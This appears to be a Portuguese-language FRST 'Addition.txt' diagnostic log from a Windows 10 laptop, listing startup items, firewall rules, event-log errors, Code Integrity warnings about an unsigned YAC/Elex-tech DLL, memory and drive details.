HKU\S-1-5-21-1492537628-2073842835-3753687853-1001\Control Panel\Desktop\\Wallpaper -> c:\windows\web\wallpaper\theme1\img2.jpg
DNS Servers: 192.168.1.1
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 0) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
Firewall do Windows está habilitado.
==================== MSCONFIG/TASK MANAGER ítens desabilitados ==
MSCONFIG\Services: AERTFilters => 2
MSCONFIG\Services: OrolixDeviceMonitor => 2
HKLM\...\StartupApproved\Run: => "SynTPEnh"
HKLM\...\StartupApproved\Run: => "DellWPF"
HKLM\...\StartupApproved\Run: => "RTHDVCPL"
HKLM\...\StartupApproved\Run: => "RtHDVBg"
HKLM\...\StartupApproved\Run: => "BtvStack"
HKLM\...\StartupApproved\Run: => "QuickSet"
HKLM\...\StartupApproved\Run: => "iTunesHelper"
HKLM\...\StartupApproved\Run32: => "IAStorIcon"
HKLM\...\StartupApproved\Run32: => "RemoteControl10"
HKLM\...\StartupApproved\Run32: => "PSafeAV"
HKLM\...\StartupApproved\Run32: => "PSafeTray"
HKLM\...\StartupApproved\Run32: => "PSafeWDS"
HKLM\...\StartupApproved\Run32: => "BAV mini setup"
HKLM\...\StartupApproved\Run32: => "Diebold - Warsaw"
HKU\S-1-5-21-1492537628-2073842835-3753687853-1001\...\StartupApproved\StartupFolder: => "Enviar para o OneNote.lnk"
HKU\S-1-5-21-1492537628-2073842835-3753687853-1001\...\StartupApproved\StartupFolder: => "Adobe Playpanel.lnk"
HKU\S-1-5-21-1492537628-2073842835-3753687853-1001\...\StartupApproved\StartupFolder: => "Microsoft SharePoint Workspace.lnk"
HKU\S-1-5-21-1492537628-2073842835-3753687853-1001\...\StartupApproved\Run: => "BackgroundContainer"
HKU\S-1-5-21-1492537628-2073842835-3753687853-1001\...\StartupApproved\Run: => "Spotify Web Helper"
HKU\S-1-5-21-1492537628-2073842835-3753687853-1001\...\StartupApproved\Run: => "Facebook Update"
HKU\S-1-5-21-1492537628-2073842835-3753687853-1001\...\StartupApproved\Run: => "Skype"
HKU\S-1-5-21-1492537628-2073842835-3753687853-1001\...\StartupApproved\Run: => "Spotify"
HKU\S-1-5-21-1492537628-2073842835-3753687853-1001\...\StartupApproved\Run: => "OfficeSyncProcess"
HKU\S-1-5-21-1492537628-2073842835-3753687853-1001\...\StartupApproved\Run: => "OneDrive"
HKU\S-1-5-21-1492537628-2073842835-3753687853-1001\...\StartupApproved\Run: => "GoogleChromeAutoLaunch_75BD889C5F695DD03545732E9F8A7932"
HKU\S-1-5-21-1492537628-2073842835-3753687853-1001\...\StartupApproved\Run: => "Chromium"
HKU\S-1-5-21-1492537628-2073842835-3753687853-1001\...\StartupApproved\Run: => "VDownloader"
==================== Regras do Firewall (Whitelisted) ===============
(Se uma entrada for incluída na fixlist, será removida do Registro. O arquivo não será movido, a menos que seja colocado separadamente.)
FirewallRules: [TCP Query User{ABC00D73-4436-4CCF-B22B-4BCD66CF82F2}C:\users\ademir monteiro\appdata\roaming\spotify\spotify.exe] => (Block) C:\users\ademir monteiro\appdata\roaming\spotify\spotify.exe
FirewallRules: [UDP Query User{FCDC5A0A-6DCA-4712-B272-0A7578E11F06}C:\users\ademir monteiro\appdata\roaming\spotify\spotify.exe] => (Block) C:\users\ademir monteiro\appdata\roaming\spotify\spotify.exe
FirewallRules: [TCP Query User{18C3FE74-FDE4-42DE-8156-E1A733EA7C0E}C:\program files (x86)\google\chrome\application\chrome.exe] => (Allow) C:\program files (x86)\google\chrome\application\chrome.exe
FirewallRules: [UDP Query User{16D067DB-6231-47FD-A3CB-8629B61E3B60}C:\program files (x86)\google\chrome\application\chrome.exe] => (Allow) C:\program files (x86)\google\chrome\application\chrome.exe
FirewallRules: [{6B446C8A-9266-46AB-85A6-E92C5974B43E}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{262684D5-BC5E-4F5C-8F2E-98E50A972023}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [TCP Query User{3608EEA0-8AA6-4702-9D10-A82439A2F0C4}C:\program files (x86)\skype\phone\skype.exe] => (Allow) C:\program files (x86)\skype\phone\skype.exe
FirewallRules: [UDP Query User{3C12E942-8ABC-4F4B-AECE-95427827D42A}C:\program files (x86)\skype\phone\skype.exe] => (Allow) C:\program files (x86)\skype\phone\skype.exe
FirewallRules: [{EBA14474-EF63-41DF-85B8-97647663D51D}] => (Allow) C:\Users\ADEMIR MONTEIRO\AppData\Local\Chromium\Application\chrome.exe
FirewallRules: [TCP Query User{913B2E14-C0BF-4700-A055-033DFD3AD27C}C:\users\ademir monteiro\appdata\local\skypeplugin\pluginhost.exe] => (Allow) C:\users\ademir monteiro\appdata\local\skypeplugin\pluginhost.exe
FirewallRules: [UDP Query User{60121106-2C58-4E36-A679-AF2E6DB3288E}C:\users\ademir monteiro\appdata\local\skypeplugin\pluginhost.exe] => (Allow) C:\users\ademir monteiro\appdata\local\skypeplugin\pluginhost.exe
FirewallRules: [TCP Query User{EE018A31-18C0-4E06-A18E-3F0B8E9FC092}C:\program files (x86)\microsoft office\office14\groove.exe] => (Block) C:\program files (x86)\microsoft office\office14\groove.exe
FirewallRules: [UDP Query User{C8AF1857-9645-4672-AD85-3340E2EC4519}C:\program files (x86)\microsoft office\office14\groove.exe] => (Block) C:\program files (x86)\microsoft office\office14\groove.exe
FirewallRules: [{84F9CA59-9F31-4EBB-95E5-2911621BCED1}] => (Allow) C:\Program Files\iTunes\iTunes.exe
FirewallRules: [{ACA1BE0D-6002-4FE3-BC36-1CF4AFB452DB}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
FirewallRules: [{2F741DD0-F787-409E-A9D6-5CC26B96E1B6}] => (Allow) C:\Program Files (x86)\Firefox\bin\FirefoxUpdate.exe
FirewallRules: [{63A99386-ABB8-4DE5-B464-8682581FB0CB}] => (Allow) C:\Program Files (x86)\Firefox\Firefox.exe
FirewallRules: [{E82E9915-0DCD-42E5-B864-B4538715A49C}] => (Allow) C:\Program Files (x86)\Eastness\Application\chrome.exe
FirewallRules: [{AA08E42F-D4F0-463E-9AE2-5CF14818877E}] => (Allow) C:\Program Files (x86)\MIO\loader\st750lm022xhn-m750mbb_s317j90d848001848001.dat
FirewallRules: [{2720CE7D-3BA2-4F9D-9A26-82C988FE6B68}] => (Allow) C:\Program Files (x86)\MIO\loader\st750lm022xhn-m750mbb_s317j90d848001848001.dat
==================== Pontos de Restauração =========================
17-04-2017 20:17:30 Ponto de Verificação Agendado
21-04-2017 18:36:14 Windows Update
==================== Dispositivos Apresentando Falhas No Gerenciador =============
==================== Erros no Log de eventos: =========================
Erros em Aplicativos:
==================
Error: (04/25/2017 06:11:31 PM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: ADEMIR)
Description: Falha na ativação do aplicativo Microsoft.BingWeather_8wekyb3d8bbwe!App com o erro: -2144927148. Veja o log Microsoft-Windows-TWinUI/Operational para obter informações adicionais.
Error: (04/25/2017 05:39:24 PM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: ADEMIR)
Description: Falha na ativação do aplicativo Microsoft.BingWeather_8wekyb3d8bbwe!App com o erro: -2144927148. Veja o log Microsoft-Windows-TWinUI/Operational para obter informações adicionais.
Error: (04/25/2017 11:37:34 AM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: ADEMIR)
Description: Falha na ativação do aplicativo Microsoft.BingWeather_8wekyb3d8bbwe!App com o erro: -2144927148. Veja o log Microsoft-Windows-TWinUI/Operational para obter informações adicionais.
Error: (04/25/2017 11:07:34 AM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: ADEMIR)
Description: Falha na ativação do aplicativo Microsoft.BingWeather_8wekyb3d8bbwe!App com o erro: -2144927148. Veja o log Microsoft-Windows-TWinUI/Operational para obter informações adicionais.
Error: (04/25/2017 10:37:35 AM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: ADEMIR)
Description: Falha na ativação do aplicativo Microsoft.BingWeather_8wekyb3d8bbwe!App com o erro: -2144927148. Veja o log Microsoft-Windows-TWinUI/Operational para obter informações adicionais.
Error: (04/25/2017 10:35:11 AM) (Source: Application Hang) (EventID: 1002) (User: )
Description: O programa MicrosoftEdgeCP.exe versão 11.0.14393.953 parou de interagir com o Windows e foi fechado. Para ver se há mais informações disponíveis sobre o problema, verifique o histórico de problemas no painel de controle Segurança e Manutenção.
ID do Processo: 2cd4
Hora de Início: 01d2bdc88b791a52
Hora de Término: 29
Caminho do Aplicativo: C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
ID do Relatório: ff16f1e8-29bb-11e7-bfec-3c77e6d2e70c
Nome completo do pacote com falha: Microsoft.MicrosoftEdge_38.14393.1066.0_neutral__8wekyb3d8bbwe
ID do aplicativo relativo ao pacote com falha: MicrosoftEdge
Error: (04/25/2017 10:33:37 AM) (Source: Application Hang) (EventID: 1002) (User: )
Description: O programa MicrosoftEdgeCP.exe versão 11.0.14393.953 parou de interagir com o Windows e foi fechado. Para ver se há mais informações disponíveis sobre o problema, verifique o histórico de problemas no painel de controle Segurança e Manutenção.
ID do Processo: 311c
Hora de Início: 01d2bdc7c7975bfc
Hora de Término: 16
Caminho do Aplicativo: C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
ID do Relatório: c733f1e3-29bb-11e7-bfec-3c77e6d2e70c
Nome completo do pacote com falha: Microsoft.MicrosoftEdge_38.14393.1066.0_neutral__8wekyb3d8bbwe
ID do aplicativo relativo ao pacote com falha: MicrosoftEdge
Error: (04/25/2017 10:28:42 AM) (Source: Microsoft-Windows-CAPI2) (EventID: 513) (User: )
Description: Falha dos Serviços de Criptografia ao processar a chamada de OnIdentity() no Objeto de Gravador do Sistema..
Details:
AddLegacyDriverFiles: Unable to back up image of binary Protocolo Microsoft LLDP.
System Error:
Acesso negado.
.
Error: (04/25/2017 10:28:09 AM) (Source: Application Hang) (EventID: 1002) (User: )
Description: O programa MicrosoftEdgeCP.exe versão 11.0.14393.953 parou de interagir com o Windows e foi fechado. Para ver se há mais informações disponíveis sobre o problema, verifique o histórico de problemas no painel de controle Segurança e Manutenção.
ID do Processo: 2ae0
Hora de Início: 01d2bdc77aa205ae
Hora de Término: 16
Caminho do Aplicativo: C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
ID do Relatório: 03465e69-29bb-11e7-bfec-3c77e6d2e70c
Nome completo do pacote com falha: Microsoft.MicrosoftEdge_38.14393.1066.0_neutral__8wekyb3d8bbwe
ID do aplicativo relativo ao pacote com falha: MicrosoftEdge
Error: (04/25/2017 10:26:03 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: Nome do aplicativo com falha: microsoftedgecp.exe, versão: 11.0.14393.953, carimbo de data/hora: 0x58ba5911
Nome do módulo com falha: ntdll.dll, versão: 10.0.14393.479, carimbo de data/hora: 0x5825887f
Código de exceção: 0xc0000005
Deslocamento da falha: 0x000000000004acbd
ID do processo com falha: 0x1458
Hora de início do aplicativo com falha: 0x01d2bdbff0d1b88d
Caminho do aplicativo com falha: C:\WINDOWS\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\microsoftedgecp.exe
Caminho do módulo com falha: C:\WINDOWS\SYSTEM32\ntdll.dll
ID do Relatório: d4671552-07f5-416c-a38f-48b46ee20781
Nome completo do pacote com falha: Microsoft.MicrosoftEdge_38.14393.1066.0_neutral__8wekyb3d8bbwe
ID do aplicativo relativo ao pacote com falha: MicrosoftEdge
Erros de Sistema:
=============
Error: (04/25/2017 05:39:20 PM) (Source: DCOM) (EventID: 10010) (User: AUTORIDADE NT)
Description: O servidor {784E29F4-5EBE-4279-9948-1E8FE941646D} não se registrou no DCOM dentro do tempo limite necessário.
Error: (04/25/2017 05:36:22 PM) (Source: DCOM) (EventID: 10016) (User: AUTORIDADE NT)
Description: As configurações de permissão específico do aplicativo não concedem permissão Local Ativação para o aplicativo de Servidor COM com CLSID
{8D8F4F83-3594-4F07-8369-FC3C3CAE4919}
e APPID
{F72671A9-012C-4725-9D2F-2A4D32D65169}
ao usuário AUTORIDADE NT\SISTEMA SID (S-1-5-18) do endereço LocalHost (Usando LRPC) que está sendo executado no contêiner de aplicativos Não Disponível SID (Não Disponível). Essa permissão de segurança pode ser modificada com a ferramenta administrativa Serviços de Componentes.
Error: (04/25/2017 05:36:22 PM) (Source: DCOM) (EventID: 10016) (User: AUTORIDADE NT)
Description: As configurações de permissão específico do aplicativo não concedem permissão Local Ativação para o aplicativo de Servidor COM com CLSID
{6B3B8D23-FA8D-40B9-8DBD-B950333E2C52}
e APPID
{4839DDB7-58C2-48F5-8283-E1D1807D0D7D}
ao usuário AUTORIDADE NT\SERVIÇO LOCAL SID (S-1-5-19) do endereço LocalHost (Usando LRPC) que está sendo executado no contêiner de aplicativos Não Disponível SID (Não Disponível). Essa permissão de segurança pode ser modificada com a ferramenta administrativa Serviços de Componentes.
Error: (04/25/2017 05:36:22 PM) (Source: DCOM) (EventID: 10016) (User: AUTORIDADE NT)
Description: As configurações de permissão específico do aplicativo não concedem permissão Local Ativação para o aplicativo de Servidor COM com CLSID
{6B3B8D23-FA8D-40B9-8DBD-B950333E2C52}
e APPID
{4839DDB7-58C2-48F5-8283-E1D1807D0D7D}
ao usuário AUTORIDADE NT\SERVIÇO LOCAL SID (S-1-5-19) do endereço LocalHost (Usando LRPC) que está sendo executado no contêiner de aplicativos Não Disponível SID (Não Disponível). Essa permissão de segurança pode ser modificada com a ferramenta administrativa Serviços de Componentes.
Error: (04/25/2017 12:01:32 PM) (Source: DCOM) (EventID: 10016) (User: AUTORIDADE NT)
Description: As configurações de permissão específico do aplicativo não concedem permissão Local Ativação para o aplicativo de Servidor COM com CLSID
{D63B10C5-BB46-4990-A94F-E40B9D520160}
e APPID
{9CA88EE3-ACB7-47C8-AFC4-AB702511C276}
ao usuário AUTORIDADE NT\SISTEMA SID (S-1-5-18) do endereço LocalHost (Usando LRPC) que está sendo executado no contêiner de aplicativos Não Disponível SID (Não Disponível). Essa permissão de segurança pode ser modificada com a ferramenta administrativa Serviços de Componentes.
Error: (04/25/2017 10:26:05 AM) (Source: DCOM) (EventID: 10016) (User: AUTORIDADE NT)
Description: As configurações de permissão específico do aplicativo não concedem permissão Local Ativação para o aplicativo de Servidor COM com CLSID
{3185A766-B338-11E4-A71E-12E3F512A338}
e APPID
{7006698D-2974-4091-A424-85DD0B909E23}
ao usuário AUTORIDADE NT\SERVIÇO LOCAL SID (S-1-5-19) do endereço LocalHost (Usando LRPC) que está sendo executado no contêiner de aplicativos Não Disponível SID (Não Disponível). Essa permissão de segurança pode ser modificada com a ferramenta administrativa Serviços de Componentes.
Error: (04/25/2017 09:28:54 AM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: Não foi possível iniciar o serviço YAC Kit Driver devido ao seguinte erro:
Não há suporte para o pedido.
Error: (04/25/2017 09:24:48 AM) (Source: DCOM) (EventID: 10010) (User: AUTORIDADE NT)
Description: O servidor {784E29F4-5EBE-4279-9948-1E8FE941646D} não se registrou no DCOM dentro do tempo limite necessário.
Error: (04/25/2017 09:23:55 AM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: O serviço Serviço Windows Defender foi finalizado inesperadamente. Isto aconteceu 1 vez(es). A seguinte ação corretiva será tomada em 100 milissegundos: Executar o programa de recuperação configurado.
Error: (04/25/2017 09:21:49 AM) (Source: DCOM) (EventID: 10016) (User: AUTORIDADE NT)
Description: As configurações de permissão específico do aplicativo não concedem permissão Local Ativação para o aplicativo de Servidor COM com CLSID
{8D8F4F83-3594-4F07-8369-FC3C3CAE4919}
e APPID
{F72671A9-012C-4725-9D2F-2A4D32D65169}
ao usuário AUTORIDADE NT\SISTEMA SID (S-1-5-18) do endereço LocalHost (Usando LRPC) que está sendo executado no contêiner de aplicativos Não Disponível SID (Não Disponível). Essa permissão de segurança pode ser modificada com a ferramenta administrativa Serviços de Componentes.
CodeIntegrity:
===================================
Date: 2017-04-25 18:23:46.685
Description: Code Integrity determined that a process (\Device\HarddiskVolume5\Windows\System32\svchost.exe) attempted to load \Device\HarddiskVolume5\Program Files (x86)\Elex-tech\YAC\iSafeSrvMon64.dll that did not meet the Windows signing level requirements.
Date: 2017-04-25 18:11:29.504
Description: Code Integrity determined that a process (\Device\HarddiskVolume5\Windows\System32\svchost.exe) attempted to load \Device\HarddiskVolume5\Program Files (x86)\Elex-tech\YAC\iSafeSrvMon64.dll that did not meet the Windows signing level requirements.
Date: 2017-04-25 18:02:38.867
Description: Code Integrity determined that a process (\Device\HarddiskVolume5\Windows\System32\svchost.exe) attempted to load \Device\HarddiskVolume5\Program Files (x86)\Elex-tech\YAC\iSafeSrvMon64.dll that did not meet the Windows signing level requirements.
Date: 2017-04-25 17:36:00.602
Description: Code Integrity determined that a process (\Device\HarddiskVolume5\Windows\System32\svchost.exe) attempted to load \Device\HarddiskVolume5\Program Files (x86)\Elex-tech\YAC\iSafeSrvMon64.dll that did not meet the Windows signing level requirements.
Date: 2017-04-25 11:52:34.913
Description: Code Integrity determined that a process (\Device\HarddiskVolume5\Windows\System32\svchost.exe) attempted to load \Device\HarddiskVolume5\Program Files (x86)\Elex-tech\YAC\iSafeSrvMon64.dll that did not meet the Windows signing level requirements.
Date: 2017-04-25 11:32:52.865
Description: Code Integrity determined that a process (\Device\HarddiskVolume5\Windows\System32\svchost.exe) attempted to load \Device\HarddiskVolume5\Program Files (x86)\Elex-tech\YAC\iSafeSrvMon64.dll that did not meet the Windows signing level requirements.
Date: 2017-04-25 11:22:34.801
Description: Code Integrity determined that a process (\Device\HarddiskVolume5\Windows\System32\svchost.exe) attempted to load \Device\HarddiskVolume5\Program Files (x86)\Elex-tech\YAC\iSafeSrvMon64.dll that did not meet the Windows signing level requirements.
Date: 2017-04-25 10:58:23.657
Description: Code Integrity determined that a process (\Device\HarddiskVolume5\Windows\System32\svchost.exe) attempted to load \Device\HarddiskVolume5\Program Files (x86)\Elex-tech\YAC\iSafeSrvMon64.dll that did not meet the Windows signing level requirements.
Date: 2017-04-25 10:52:34.784
Description: Code Integrity determined that a process (\Device\HarddiskVolume5\Windows\System32\svchost.exe) attempted to load \Device\HarddiskVolume5\Program Files (x86)\Elex-tech\YAC\iSafeSrvMon64.dll that did not meet the Windows signing level requirements.
Date: 2017-04-25 10:37:35.301
Description: Code Integrity determined that a process (\Device\HarddiskVolume5\Windows\System32\svchost.exe) attempted to load \Device\HarddiskVolume5\Program Files (x86)\Elex-tech\YAC\iSafeSrvMon64.dll that did not meet the Windows signing level requirements.
==================== Informações da Memória ===========================
Processador: Intel(R) Core(TM) i3-3217U CPU @ 1.80GHz
Percentagem de memória em uso: 63%
RAM física total: 3961.09 MB
RAM física disponível: 1437.06 MB
Virtual Total: 5981.75 MB
Virtual disponível: 2611.1 MB
==================== Drives ================================
Drive c: (OS) (Fixed) (Total:687.44 GB) (Free:488.82 GB) NTFS
Drive e: (PBR Image) (Fixed) (Total:9.62 GB) (Free:0.72 GB) NTFS
Drive f: (ESP) (Fixed) (Total:0.48 GB) (Free:0.44 GB) FAT32
==================== MBR & Tabela de Partições ==================
========================================================
Disk: 0 (Size: 698.6 GB) (Disk ID: 33DB2EEA)
Partition: GPT.
==================== Fim de Addition.txt ============================